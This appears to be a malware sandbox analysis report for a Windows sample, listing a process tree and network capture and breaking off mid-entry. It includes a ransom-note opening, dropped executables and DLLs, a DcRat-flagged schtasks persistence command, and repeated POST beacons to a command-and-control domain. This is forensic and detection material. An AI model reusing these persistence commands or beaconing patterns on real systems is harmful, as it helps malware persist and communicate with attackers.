                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:1544
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:1576
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6284 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2356
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6244 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:3516
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6384 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1064
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6408 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:2208
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:720
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:2892
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1020
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:4916
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:4868
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:4140
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:2684
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4212
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:1688
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:2944
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6444 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:3200
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:4200
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:4336
                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:5092
                                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4536
                                                                                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\SystemID\PersonalID.txt
                                                                                                                                            1⤵
                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                            PID:1988
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\urjgbsd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\urjgbsd
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:4332
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\ajjgbsd
                                                                                                                                            C:\Users\Admin\AppData\Roaming\ajjgbsd
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4196
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 320
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:3788
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4196 -ip 4196
                                                                                                                                            1⤵
                                                                                                                                              PID:1440
                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              C:\Windows\SysWOW64\svchost.exe -k LocalService
                                                                                                                                              1⤵
                                                                                                                                              • Loads dropped DLL
  • Checks processor information in registry
  PID:4064
• C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\system32\rundll32.exe" "c:\program files (x86)\windowspowershell\modules\cpdf_rhp..dll",XgZYYzY3NQ==
  2⤵
  • Loads dropped DLL
  • Checks processor information in registry
  PID:2936
• C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\system32\rundll32.exe" "c:\program files (x86)\windowspowershell\modules\cpdf_rhp..dll",XgZYYzY3NQ==
  2⤵
  PID:2280
• C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 15570
  3⤵
  PID:1416
• C:\Windows\SysWOW64\schtasks.exe
  schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
  3⤵
  PID:4720
• C:\Windows\SysWOW64\schtasks.exe
  schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
  3⤵
  PID:2916
• C:\Users\Admin\Desktop\adwcleaner.exe
  "C:\Users\Admin\Desktop\adwcleaner.exe"
  1⤵
  • Executes dropped EXE
  • Suspicious behavior: AddClipboardFormatListener
  • Suspicious behavior: GetForegroundWindowSpam
  • Suspicious use of SetWindowsHookEx
  PID:1664
• C:\Windows\System32\netsh.exe
  "C:\Windows\System32\netsh.exe" winsock reset
  2⤵
  PID:1768
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  PID:4964
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:5020
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:4716
• C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  1⤵
  PID:2132
• C:\Users\Admin\Desktop\adwcleaner.exe
  "C:\Users\Admin\Desktop\adwcleaner.exe"
  1⤵
  PID:1932
• C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  1⤵
  PID:3456
• C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
  2⤵
  • DcRat
  • Creates scheduled task(s)
  PID:4228
• C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  1⤵
  PID:4824

Network

• flag-unknown
  DNS
  potunulit.org
  Remote address:
  8.8.8.8:53
  Request
  potunulit.org
  IN A
  Response
  potunulit.org
  IN A
  188.114.96.0
  potunulit.org
  IN A
  188.114.97.0
• flag-unknown
  POST
  http://potunulit.org/
  Remote address:
  188.114.96.0:80
  Request
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://mnxab.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 290
  Host: potunulit.org
  Response
  HTTP/1.1 404 Not Found
  Date: Mon, 09 Jan 2023 12:47:17 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 786d47d41bb728ad-AMS
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
• flag-unknown
  POST
  http://potunulit.org/
  Remote address:
  188.114.96.0:80
  Request
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://epqgyk.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 230
  Host: potunulit.org
  Response
  HTTP/1.1 404 Not Found
  Date: Mon, 09 Jan 2023 12:47:17 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 786d47d4fce728ad-AMS
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
• flag-unknown
  POST
  http://potunulit.org/
  Remote address:
  188.114.96.0:80
  Request
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://uphfk.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 286
  Host: potunulit.org
  Response
  HTTP/1.1 404 Not Found
  Date: Mon, 09 Jan 2023 12:47:17 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 786d47d8e99528ad-AMS
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
• flag-unknown
  POST
  http://potunulit.org/
  Remote address:
  188.114.96.0:80
  Request
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://cetcmi.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 354
  Host: potunulit.org
  Response
  HTTP/1.1 200 OK
  Date: Mon, 09 Jan 2023 12:47:18 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B82P37QKOQHjX%2BoNv2ujLJmp6ejJKJPr8iJzCMKM85X4UERYk4%2BqTaTtXR1rvEJga%2FXE05fASpoHW%2Ba8cZuTOkEPh22vvMzon%2Fq401H1SUU2loq%2F6KDPGrY%2FgOSJnYFL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47d97a3028ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://acnbwbl.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 302
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VdjeSZ2jpaPhp6QUcT6X07cbs6r9VP6uVkz0qWP0%2BXHFwxgoSuQXuYvhr50bAuWKR3MEXuud554CndCaPP9btOEWWURrsukpfo9FIa%2FJSAPj6kb9QnoavTuhDXiGysWO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47da3b0428ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://teqsk.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 338
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dsBJDiZZPIZ1JTcziVheFdXdgdWPNyCmUp1cXKUrVMasK9QO6tP6Hr%2FHpmun57E99ZUHT1BcmSkmwk8CQeGgRKTOvOBBIprxQ2qY7GApcO%2Fn%2BOeg3gzGiNlFZtghMjK5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47dcbe2728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://lmrfwmb.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 121
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E1r8M7RvXlmwYeesvepheDNnzVqieEy2fjdt28nwKNVB93NPsGofKPMcoEa928zxGGr4qtmIH9fcu2cCLDhRgW9AsJY311g8K9kgeF%2BmLgpaq4XCqCgH013XQzG39R%2B5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47dddf8728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://jawjgopu.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 351
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M%2FDYWq3%2BNxdkpiMDHUVu58u%2Bp08M8L69XVS%2BAECQDghorfPPBPolZSvp7ykx1CAQAxxIoiK5UQg2IOCyswFy7ZRXFF1pWL%2BVeZ7N7U1rhxpzYfTW0I1noJCnlFlAxypJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47e6285128ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://joaqghgni.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 141
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xtBWgn7SgYBRU%2FSjYjuFttUJ5A3St6iVXw019vWnd8y7diL4mlV%2B2KFtUbPSj80Jx%2BgRzkyruUlSIwdS3gmnt%2FThndwencG%2FODVgRDYQQoKCrb%2BxGY8z0HqtTxGO36Vv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47e749cd28ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://wxfnbvx.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 239
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FycbFRbXw7fWRPKYC340K%2BmHJieEPxBDfDnt0tVj6wHXzm%2B8s7aslQSV7A84%2B4DK5zpxoFckuiUqZ0kpBIfJAmwGNSnJ5H8YDQ9G0EbhfPpE2soPTJqT%2FMs%2FRVGumerE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47eace6d28ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://wpaddgmv.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 222
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oh10uV9HpfpcfOGhuV9nPlQMq75yjsmwmokF1w%2FJ%2FTFGeLCLLG85yAFUWS861bRVkT2dtuuMeCbqAncrdk4j3CE0Sk9CcDsRUcpIsELFHFGPM4U5%2BNkgkjcIobkYILzv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47ed292728ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://fapavk.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 125
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
